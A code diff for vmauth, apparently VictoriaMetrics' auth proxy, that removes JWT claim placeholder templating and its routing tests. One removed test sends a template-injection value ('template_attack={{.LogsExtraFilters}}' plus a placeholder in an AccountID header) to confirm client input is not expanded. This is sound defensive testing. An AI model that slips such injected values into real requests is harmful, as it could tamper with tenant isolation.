defer ui.endConcurrencyLimit()
|
||||
|
||||
// Process the request.
|
||||
processRequest(w, r, ui, tkn)
|
||||
processRequest(w, r, ui)
|
||||
}
|
||||
|
||||
func beginConcurrencyLimit(ctx context.Context) error {
|
||||
@@ -390,7 +345,7 @@ func bufferRequestBody(ctx context.Context, r io.ReadCloser, userName string) (i
|
||||
return bb, nil
|
||||
}
|
||||
|
||||
func processRequest(w http.ResponseWriter, r *http.Request, ui *UserInfo, tkn *jwt.Token) {
|
||||
func processRequest(w http.ResponseWriter, r *http.Request, ui *UserInfo) {
|
||||
u := normalizeURL(r.URL)
|
||||
up, hc := ui.getURLPrefixAndHeaders(u, r.Host, r.Header)
|
||||
isDefault := false
|
||||
@@ -422,21 +377,16 @@ func processRequest(w http.ResponseWriter, r *http.Request, ui *UserInfo, tkn *j
|
||||
break
|
||||
}
|
||||
targetURL := bu.url
|
||||
if tkn != nil {
|
||||
// for security reasons allow templating only for configured url values and headers
|
||||
targetURL, hc = replaceJWTPlaceholders(bu, hc, tkn.VMAccess())
|
||||
}
|
||||
if isDefault {
|
||||
// Don't change path and add request_path query param for default route.
|
||||
targetURLCopy := *targetURL
|
||||
query := targetURL.Query()
|
||||
query.Set("request_path", u.String())
|
||||
targetURLCopy.RawQuery = query.Encode()
|
||||
targetURL = &targetURLCopy
|
||||
targetURL.RawQuery = query.Encode()
|
||||
} else {
|
||||
// Update path for regular routes.
|
||||
targetURL = mergeURLs(targetURL, u, up.dropSrcPathPrefixParts, up.mergeQueryArgs)
|
||||
}
|
||||
|
||||
wasLocalRetry := false
|
||||
again:
|
||||
ok, needLocalRetry := tryProcessingRequest(w, r, targetURL, hc, up.retryStatusCodes, ui, bu)
|
||||
|
||||
@@ -12,13 +12,11 @@ import (
|
||||
"encoding/pem"
|
||||
"fmt"
|
||||
"io"
|
||||
"math/big"
|
||||
"net"
|
||||
"net/http"
|
||||
"net/http/httptest"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"sort"
|
||||
"strings"
|
||||
"sync/atomic"
|
||||
"testing"
|
||||
@@ -103,35 +101,6 @@ User-Agent: vmauth
|
||||
X-Forwarded-For: 12.34.56.78, 42.2.3.84`
|
||||
f(cfgStr, requestURL, backendHandler, responseExpected)
|
||||
|
||||
// with default_url
|
||||
cfgStr = `
|
||||
unauthorized_user:
|
||||
default_url: {BACKEND}/default
|
||||
url_map:
|
||||
- src_paths:
|
||||
- /empty
|
||||
url_prefix: {BACKEND}/empty`
|
||||
requestURL = "http://some-host.com/abc/def?some_arg=some_value"
|
||||
backendHandler = func(w http.ResponseWriter, r *http.Request) {
|
||||
h := w.Header()
|
||||
h.Set("Connection", "close")
|
||||
h.Set("Foo", "bar")
|
||||
|
||||
var bb bytes.Buffer
|
||||
if err := r.Header.Write(&bb); err != nil {
|
||||
panic(fmt.Errorf("unexpected error when marshaling headers: %w", err))
|
||||
}
|
||||
fmt.Fprintf(w, "requested_url=http://%s%s\n%s", r.Host, r.URL, bb.String())
|
||||
}
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
Foo: bar
|
||||
requested_url={BACKEND}/default?request_path=http%3A%2F%2Fsome-host.com%2Fabc%2Fdef%3Fsome_arg%3Dsome_value
|
||||
Pass-Header: abc
|
||||
User-Agent: vmauth
|
||||
X-Forwarded-For: 12.34.56.78, 42.2.3.84`
|
||||
f(cfgStr, requestURL, backendHandler, responseExpected)
|
||||
|
||||
// routing of all failed to authorize requests to unauthorized_user (issue #7543)
|
||||
cfgStr = `
|
||||
unauthorized_user:
|
||||
@@ -602,41 +571,22 @@ func TestJWTRequestHandler(t *testing.T) {
|
||||
|
||||
return payload + "." + signatureB64
|
||||
}
|
||||
genToken(t, nil, false)
|
||||
|
||||
f := func(cfgStr string, r *http.Request, responseExpected string) {
|
||||
t.Helper()
|
||||
|
||||
ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
if _, err := w.Write([]byte("path: " + r.URL.Path + "\n")); err != nil {
|
||||
if _, err := w.Write([]byte(r.RequestURI + "\n")); err != nil {
|
||||
panic(fmt.Errorf("cannot write response: %w", err))
|
||||
}
|
||||
if _, err := w.Write([]byte("query:\n")); err != nil {
|
||||
panic(fmt.Errorf("cannot write response: %w", err))
|
||||
}
|
||||
names := make([]string, 0, len(r.URL.Query()))
|
||||
query := r.URL.Query()
|
||||
for n := range query {
|
||||
names = append(names, n)
|
||||
}
|
||||
sort.Strings(names)
|
||||
for _, n := range names {
|
||||
for _, v := range query[n] {
|
||||
if _, err := w.Write([]byte(" " + n + "=" + v + "\n")); err != nil {
|
||||
panic(fmt.Errorf("cannot write response: %w", err))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if _, err := w.Write([]byte("headers:\n")); err != nil {
|
||||
panic(fmt.Errorf("cannot write response: %w", err))
|
||||
}
|
||||
if v := r.Header.Get(`AccountID`); v != "" {
|
||||
if _, err := w.Write([]byte(` AccountID=` + v + "\n")); err != nil {
|
||||
if v := r.Header.Get(`extra_label`); v != "" {
|
||||
if _, err := w.Write([]byte(`extra_label=` + v + "\n")); err != nil {
|
||||
panic(fmt.Errorf("cannot write response: %w", err))
|
||||
}
|
||||
}
|
||||
if v := r.Header.Get(`ProjectID`); v != "" {
|
||||
if _, err := w.Write([]byte(` ProjectID=` + v + "\n")); err != nil {
|
||||
if v := r.Header.Get(`extra_filters`); v != "" {
|
||||
if _, err := w.Write([]byte(`extra_filters=` + v + "\n")); err != nil {
|
||||
panic(fmt.Errorf("cannot write response: %w", err))
|
||||
}
|
||||
}
|
||||
@@ -682,7 +632,7 @@ users:
|
||||
- %q
|
||||
url_prefix: {BACKEND}/foo`, string(publicKeyPEM))
|
||||
noVMAccessClaimToken := genToken(t, nil, true)
|
||||
minimalToken := genToken(t, map[string]any{
|
||||
defaultVMAccessClaimToken := genToken(t, map[string]any{
|
||||
"exp": time.Now().Add(10 * time.Minute).Unix(),
|
||||
"vm_access": map[string]any{},
|
||||
}, true)
|
||||
@@ -695,30 +645,6 @@ users:
|
||||
"vm_access": map[string]any{},
|
||||
}, false)
|
||||
|
||||
fullToken := genToken(t, map[string]any{
|
||||
"exp": time.Now().Add(10 * time.Minute).Unix(),
|
||||
"vm_access": map[string]any{
|
||||
"metrics_account_id": 123,
|
||||
"metrics_project_id": 234,
|
||||
"metrics_extra_labels": []string{
|
||||
"label1=value1",
|
||||
"label2=value2",
|
||||
},
|
||||
"metrics_extra_filters": []string{
|
||||
`{label3="value3"}`,
|
||||
`{label4="value4"}`,
|
||||
},
|
||||
"logs_account_id": 345,
|
||||
"logs_project_id": 456,
|
||||
"logs_extra_filters": []string{
|
||||
`{"namespace":"my-app","env":"prod"}`,
|
||||
},
|
||||
"logs_extra_stream_filters": []string{
|
||||
`{"team":"dev"}`,
|
||||
},
|
||||
},
|
||||
}, true)
|
||||
|
||||
// missing authorization
|
||||
request := httptest.NewRequest(`GET`, "http://some-host.com/abc", nil)
|
||||
responseExpected := `
|
||||
@@ -756,9 +682,7 @@ Unauthorized`
|
||||
request.Header.Set(`Authorization`, `Bearer `+invalidSignatureToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /foo/abc
|
||||
query:
|
||||
headers:`
|
||||
/foo/abc`
|
||||
f(`
|
||||
users:
|
||||
- jwt:
|
||||
@@ -767,17 +691,15 @@ users:
|
||||
|
||||
// token with default valid vm_access claim
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/abc", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+minimalToken)
|
||||
request.Header.Set(`Authorization`, `Bearer `+defaultVMAccessClaimToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /foo/abc
|
||||
query:
|
||||
headers:`
|
||||
/foo/abc`
|
||||
f(simpleCfgStr, request, responseExpected)
|
||||
|
||||
// jwt token used but no matching user with JWT token in config
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/abc", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+minimalToken)
|
||||
request.Header.Set(`Authorization`, `Bearer `+defaultVMAccessClaimToken)
|
||||
responseExpected = `
|
||||
statusCode=401
|
||||
Unauthorized`
|
||||
@@ -793,747 +715,20 @@ users:
|
||||
t.Fatalf("failed to write public key file: %s", err)
|
||||
}
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/abc", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+minimalToken)
|
||||
request.Header.Set(`Authorization`, `Bearer `+defaultVMAccessClaimToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /foo/abc
|
||||
query:
|
||||
headers:`
|
||||
/foo/abc`
|
||||
f(fmt.Sprintf(`
|
||||
users:
|
||||
- jwt:
|
||||
public_key_files:
|
||||
- %q
|
||||
url_prefix: {BACKEND}/foo`, publicKeyFile), request, responseExpected)
|
||||
|
||||
// ---- VictoriaMetrics specific tests ----
|
||||
|
||||
// extra_label and extra_filters dropped if empty in vm_access claim
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/api/v1/query", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+minimalToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /select/0:0/api/v1/query
|
||||
query:
|
||||
headers:`
|
||||
f(fmt.Sprintf(
|
||||
`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
url_prefix: {BACKEND}/select/{{.MetricsTenant}}/?extra_label={{.MetricsExtraLabels}}&extra_filters={{.MetricsExtraFilters}}`, string(publicKeyPEM)),
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
|
||||
// extra_label and extra_filters set if present in vm_access claim
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/api/v1/query", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+fullToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /select/123:234/api/v1/query
|
||||
query:
|
||||
extra_filters={label3="value3"}
|
||||
extra_filters={label4="value4"}
|
||||
extra_label=label1=value1
|
||||
extra_label=label2=value2
|
||||
headers:`
|
||||
f(fmt.Sprintf(
|
||||
`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
url_prefix: {BACKEND}/select/{{.MetricsTenant}}/?extra_label={{.MetricsExtraLabels}}&extra_filters={{.MetricsExtraFilters}}`, string(publicKeyPEM)),
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
|
||||
// extra_label and extra_filters from vm_access claim merged with statically defined
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/api/v1/query", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+fullToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /select/123:234/api/v1/query
|
||||
query:
|
||||
extra_filters=aStaticFilter
|
||||
extra_filters={label3="value3"}
|
||||
extra_filters={label4="value4"}
|
||||
extra_label=aStaticLabel
|
||||
extra_label=label1=value1
|
||||
extra_label=label2=value2
|
||||
headers:`
|
||||
f(fmt.Sprintf(
|
||||
`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
url_prefix: {BACKEND}/select/{{.MetricsTenant}}/?extra_label=aStaticLabel&extra_filters=aStaticFilter&extra_label={{.MetricsExtraLabels}}&extra_filters={{.MetricsExtraFilters}}`, string(publicKeyPEM)),
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
|
||||
// extra_labels and extra_filters set from vm_access claim should override user provided query args
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/api/v1/query?extra_label=userProvidedLabel&extra_filters=userProvidedFilter", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+fullToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /select/123:234/api/v1/query
|
||||
query:
|
||||
extra_filters={label3="value3"}
|
||||
extra_filters={label4="value4"}
|
||||
extra_label=label1=value1
|
||||
extra_label=label2=value2
|
||||
headers:`
|
||||
f(
|
||||
fmt.Sprintf(`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
url_prefix: {BACKEND}/select/{{.MetricsTenant}}/?extra_label={{.MetricsExtraLabels}}&extra_filters={{.MetricsExtraFilters}}`, string(publicKeyPEM)),
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
|
||||
// merge user provided query args with extra_labels and extra_filters from vm_access claim
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/api/v1/query?extra_label=userProvidedLabel&extra_filters=userProvidedFilter", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+fullToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /select/123:234/api/v1/query
|
||||
query:
|
||||
extra_filters={label3="value3"}
|
||||
extra_filters={label4="value4"}
|
||||
extra_filters=userProvidedFilter
|
||||
extra_label=label1=value1
|
||||
extra_label=label2=value2
|
||||
extra_label=userProvidedLabel
|
||||
headers:`
|
||||
f(fmt.Sprintf(`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
merge_query_args: [extra_filters, extra_label]
|
||||
url_prefix: {BACKEND}/select/{{.MetricsTenant}}/?extra_label={{.MetricsExtraLabels}}&extra_filters={{.MetricsExtraFilters}}`, string(publicKeyPEM)),
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
|
||||
// pass user provided query args if vm_access claim has no extra_labels and extra_filters
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/api/v1/query?extra_label=userProvidedLabel&extra_filters=userProvidedFilter", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+fullToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /select/123:234/api/v1/query
|
||||
query:
|
||||
extra_filters=userProvidedFilter
|
||||
extra_label=userProvidedLabel
|
||||
headers:`
|
||||
f(fmt.Sprintf(`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
merge_query_args: [extra_filters, extra_label]
|
||||
url_prefix: {BACKEND}/select/{{.MetricsTenant}}/`, string(publicKeyPEM)),
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
|
||||
// pass user provided query args if vm_access claim has no extra_labels and extra_filters
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/api/v1/query?extra_label=userProvidedLabel&extra_filters=userProvidedFilter", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+fullToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /select/123:234/api/v1/query
|
||||
query:
|
||||
extra_filters=userProvidedFilter
|
||||
extra_label=userProvidedLabel
|
||||
headers:`
|
||||
f(fmt.Sprintf(`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
url_prefix: {BACKEND}/select/{{.MetricsTenant}}/`, string(publicKeyPEM)),
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
|
||||
// placeholders in url_map
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/api/v1/query", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+fullToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /select/123:234/api/v1/query
|
||||
query:
|
||||
extra_filters={label3="value3"}
|
||||
extra_filters={label4="value4"}
|
||||
extra_label=label1=value1
|
||||
extra_label=label2=value2
|
||||
headers:`
|
||||
f(fmt.Sprintf(
|
||||
`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
url_map:
|
||||
- src_paths: ["/api/.*"]
|
||||
url_prefix: {BACKEND}/select/{{.MetricsTenant}}/?extra_label={{.MetricsExtraLabels}}&extra_filters={{.MetricsExtraFilters}}`, string(publicKeyPEM)),
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
|
||||
// ---- VictoriaLogs specific tests ----
|
||||
|
||||
// tenant headers not overwritten if set statically
|
||||
// extra_filters extra_stream_filters dropped if empty in vm_access claim
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/query", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+minimalToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /select/logsql/query
|
||||
query:
|
||||
headers:
|
||||
AccountID=555
|
||||
ProjectID=666`
|
||||
f(
|
||||
fmt.Sprintf(`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
headers:
|
||||
- "AccountID: 555"
|
||||
- "ProjectID: 666"
|
||||
url_prefix: {BACKEND}/select/logsql/?extra_filters={{.LogsExtraFilters}}&extra_stream_filters={{.LogsExtraStreamFilters}}`, string(publicKeyPEM)),
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
|
||||
// tenant headers are overwritten if set as placeholders
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/query", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+minimalToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /select/logsql/query
|
||||
query:
|
||||
headers:
|
||||
AccountID=0
|
||||
ProjectID=0`
|
||||
f(
|
||||
fmt.Sprintf(`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
headers:
|
||||
- "AccountID: {{.LogsAccountID}}"
|
||||
- "ProjectID: {{.LogsProjectID}}"
|
||||
url_prefix: {BACKEND}/select/logsql/?extra_filters={{.LogsExtraFilters}}&extra_stream_filters={{.LogsExtraStreamFilters}}`, string(publicKeyPEM)),
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
|
||||
// tenant headers are overwritten if set as placeholders
|
||||
// extra_filters extra_stream_filters from vm_access claim merged with statically defined
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/query", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+fullToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /select/logsql/query
|
||||
query:
|
||||
extra_filters=aStaticFilter
|
||||
extra_filters={"namespace":"my-app","env":"prod"}
|
||||
extra_stream_filters=aStaticStreamFilter
|
||||
extra_stream_filters={"team":"dev"}
|
||||
headers:
|
||||
AccountID=345
|
||||
ProjectID=456`
|
||||
f(
|
||||
fmt.Sprintf(`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
headers:
|
||||
- "AccountID: {{.LogsAccountID}}"
|
||||
- "ProjectID: {{.LogsProjectID}}"
|
||||
url_prefix: {BACKEND}/select/logsql/?extra_filters=aStaticFilter&extra_stream_filters=aStaticStreamFilter&extra_filters={{.LogsExtraFilters}}&extra_stream_filters={{.LogsExtraStreamFilters}}`, string(publicKeyPEM)),
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
|
||||
// tenant headers are overwritten if set as placeholders
|
||||
// extra_filters extra_stream_filters from vm_access claim merged with statically defined
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/query", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+fullToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /select/logsql/query
|
||||
query:
|
||||
extra_filters=aStaticFilter
|
||||
extra_filters={"namespace":"my-app","env":"prod"}
|
||||
extra_stream_filters=aStaticStreamFilter
|
||||
extra_stream_filters={"team":"dev"}
|
||||
headers:
|
||||
AccountID=345
|
||||
ProjectID=456`
|
||||
f(
|
||||
fmt.Sprintf(`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
headers:
|
||||
- "AccountID: {{.LogsAccountID}}"
|
||||
- "ProjectID: {{.LogsProjectID}}"
|
||||
url_prefix: {BACKEND}/select/logsql/?extra_filters=aStaticFilter&extra_stream_filters=aStaticStreamFilter&extra_filters={{.LogsExtraFilters}}&extra_stream_filters={{.LogsExtraStreamFilters}}`, string(publicKeyPEM)),
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
|
||||
// claim info should overwrite user provided query args and headers
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/query?extra_filters=aUserFilter&extra_stream_filters=aUserStreamFilter", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+fullToken)
|
||||
request.Header.Set(`AccountID`, `aUserAccountID`)
|
||||
request.Header.Set(`ProjectID`, `aUserProjectID`)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /select/logsql/query
|
||||
query:
|
||||
extra_filters={"namespace":"my-app","env":"prod"}
|
||||
extra_stream_filters={"team":"dev"}
|
||||
headers:
|
||||
AccountID=345
|
||||
ProjectID=456`
|
||||
f(
|
||||
fmt.Sprintf(`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
headers:
|
||||
- "AccountID: {{.LogsAccountID}}"
|
||||
- "ProjectID: {{.LogsProjectID}}"
|
||||
url_prefix: {BACKEND}/select/logsql/?extra_filters={{.LogsExtraFilters}}&extra_stream_filters={{.LogsExtraStreamFilters}}`, string(publicKeyPEM)),
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
|
||||
// merge user provided query args with extra_filters and extra_stream_filters from vm_access claim
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/query?extra_filters=aUserFilter&extra_stream_filters=aUserStreamFilter", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+fullToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /select/logsql/query
|
||||
query:
|
||||
extra_filters={"namespace":"my-app","env":"prod"}
|
||||
extra_filters=aUserFilter
|
||||
extra_stream_filters={"team":"dev"}
|
||||
extra_stream_filters=aUserStreamFilter
|
||||
headers:
|
||||
AccountID=345
|
||||
ProjectID=456`
|
||||
f(
|
||||
fmt.Sprintf(`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
headers:
|
||||
- "AccountID: {{.LogsAccountID}}"
|
||||
- "ProjectID: {{.LogsProjectID}}"
|
||||
merge_query_args: [extra_filters, extra_stream_filters]
|
||||
url_prefix: {BACKEND}/select/logsql/?extra_filters={{.LogsExtraFilters}}&extra_stream_filters={{.LogsExtraStreamFilters}}`, string(publicKeyPEM)),
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
|
||||
// pass user provided query args if vm_access claim has no extra_labels and extra_filters
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/query?extra_filters=aUserFilter&extra_stream_filters=aUserStreamFilter", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+minimalToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /select/logsql/query
|
||||
query:
|
||||
extra_filters=aUserFilter
|
||||
extra_stream_filters=aUserStreamFilter
|
||||
headers:
|
||||
AccountID=0
|
||||
ProjectID=0`
|
||||
f(
|
||||
fmt.Sprintf(`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
headers:
|
||||
- "AccountID: {{.LogsAccountID}}"
|
||||
- "ProjectID: {{.LogsProjectID}}"
|
||||
merge_query_args: [extra_filters, extra_stream_filters]
|
||||
url_prefix: {BACKEND}/select/logsql/?extra_filters={{.LogsExtraFilters}}&extra_stream_filters={{.LogsExtraStreamFilters}}`, string(publicKeyPEM)),
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
|
||||
// placeholders in url_map
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/query", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+fullToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /select/logsql/query
|
||||
query:
|
||||
extra_filters={"namespace":"my-app","env":"prod"}
|
||||
extra_stream_filters={"team":"dev"}
|
||||
headers:
|
||||
AccountID=345
|
||||
ProjectID=456`
|
||||
f(fmt.Sprintf(
|
||||
`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
url_map:
|
||||
- src_paths: ["/query"]
|
||||
headers:
|
||||
- "AccountID: {{.LogsAccountID}}"
|
||||
- "ProjectID: {{.LogsProjectID}}"
|
||||
url_prefix: {BACKEND}/select/logsql/?extra_filters={{.LogsExtraFilters}}&extra_stream_filters={{.LogsExtraStreamFilters}}`, string(publicKeyPEM)),
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
|
||||
// multiple placeholders in url_map for the same param
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/query", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+fullToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /select/logsql/query
|
||||
query:
|
||||
extra_filters={"namespace":"my-app","env":"prod"}
|
||||
extra_stream_filters={"team":"dev"}
|
||||
tenant_info=static=value
|
||||
tenant_info=345
|
||||
tenant_info=456
|
||||
headers:
|
||||
AccountID=345
|
||||
ProjectID=456`
|
||||
f(fmt.Sprintf(
|
||||
`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
url_map:
|
||||
- src_paths: ["/query"]
|
||||
headers:
|
||||
- "AccountID: {{.LogsAccountID}}"
|
||||
- "ProjectID: {{.LogsProjectID}}"
|
||||
url_prefix: {BACKEND}/select/logsql/?extra_filters={{.LogsExtraFilters}}&extra_stream_filters={{.LogsExtraStreamFilters}}&tenant_info=static=value&tenant_info={{.LogsAccountID}}&tenant_info={{.LogsProjectID}}`, string(publicKeyPEM)),
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
// client request params must be ignored by placeholders
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/query?template_attack={{.LogsExtraFilters}}", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+fullToken)
|
||||
request.Header.Set(`AccountID`, `{{.LogsAccountID}}`)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /select/logsql/query
|
||||
query:
|
||||
extra_filters={"namespace":"my-app","env":"prod"}
|
||||
extra_stream_filters={"team":"dev"}
|
||||
template_attack={{.LogsExtraFilters}}
|
||||
headers:
|
||||
AccountID={{.LogsAccountID}}`
|
||||
f(fmt.Sprintf(
|
||||
`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
url_map:
|
||||
- src_paths: ["/query"]
|
||||
url_prefix: {BACKEND}/select/logsql/?extra_filters={{.LogsExtraFilters}}&extra_stream_filters={{.LogsExtraStreamFilters}}`, string(publicKeyPEM)),
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
nestedToken := genToken(t, map[string]any{
|
||||
"exp": time.Now().Add(10 * time.Minute).Unix(),
|
||||
"team": "dev",
|
||||
"nested": map[string]any{
|
||||
"department_id": 0,
|
||||
"scopes": []string{"metrics", "logs"},
|
||||
"team_permissions": map[string]any{
|
||||
"read": 0,
|
||||
"write": 1,
|
||||
},
|
||||
},
|
||||
"vm_access": map[string]any{
|
||||
"metrics_account_id": 123,
|
||||
"metrics_project_id": 234,
|
||||
"metrics_extra_labels": []string{
|
||||
"label1=value1",
|
||||
"label2=value2",
|
||||
},
|
||||
"metrics_extra_filters": []string{
|
||||
`{label3="value3"}`,
|
||||
`{label4="value4"}`,
|
||||
},
|
||||
"logs_account_id": 345,
|
||||
"logs_project_id": 456,
|
||||
"logs_extra_filters": []string{
|
||||
`{"namespace":"my-app","env":"prod"}`,
|
||||
},
|
||||
"logs_extra_stream_filters": []string{
|
||||
`{"team":"dev"}`,
|
||||
},
|
||||
},
|
||||
}, true)
|
||||
|
||||
// use claim for routing, must specific match wins
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/route", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+nestedToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /dev/route
|
||||
query:
|
||||
headers:
|
||||
`
|
||||
f(`
|
||||
users:
|
||||
- jwt:
|
||||
skip_verify: true
|
||||
match_claims:
|
||||
team: dev
|
||||
nested.scopes.1: "logs"
|
||||
nested.department_id: "0"
|
||||
url_map:
|
||||
- src_paths: ["/route"]
|
||||
url_prefix: {BACKEND}/dev
|
||||
- jwt:
|
||||
skip_verify: true
|
||||
match_claims:
|
||||
team: dev
|
||||
nested.scopes.1: "logs"
|
||||
url_map:
|
||||
- src_paths: ["/route"]
|
||||
url_prefix: {BACKEND}/ops
|
||||
`,
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
|
||||
// use claim for routing, most specific not matching
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/route", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+nestedToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /less_claims/route
|
||||
query:
|
||||
headers:
|
||||
`
|
||||
f(`
|
||||
users:
|
||||
- jwt:
|
||||
skip_verify: true
|
||||
match_claims:
|
||||
team: ops
|
||||
nested.scopes.1: "logs"
|
||||
nested.department_id: "0"
|
||||
url_map:
|
||||
- src_paths: ["/route"]
|
||||
url_prefix: {BACKEND}/more_claims
|
||||
- jwt:
|
||||
skip_verify: true
|
||||
match_claims:
|
||||
team: dev
|
||||
nested.team_permissions.write: "1"
|
||||
url_map:
|
||||
- src_paths: ["/route"]
|
||||
url_prefix: {BACKEND}/less_claims
|
||||
`,
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
|
||||
// use claim for routing, empty claim match
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/route", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+nestedToken)
|
||||
responseExpected = `
|
||||
statusCode=200
|
||||
path: /empty/route
|
||||
query:
|
||||
headers:
|
||||
`
|
||||
f(`
|
||||
users:
|
||||
- jwt:
|
||||
skip_verify: true
|
||||
url_map:
|
||||
- src_paths: ["/route"]
|
||||
url_prefix: {BACKEND}/empty
|
||||
- jwt:
|
||||
skip_verify: true
|
||||
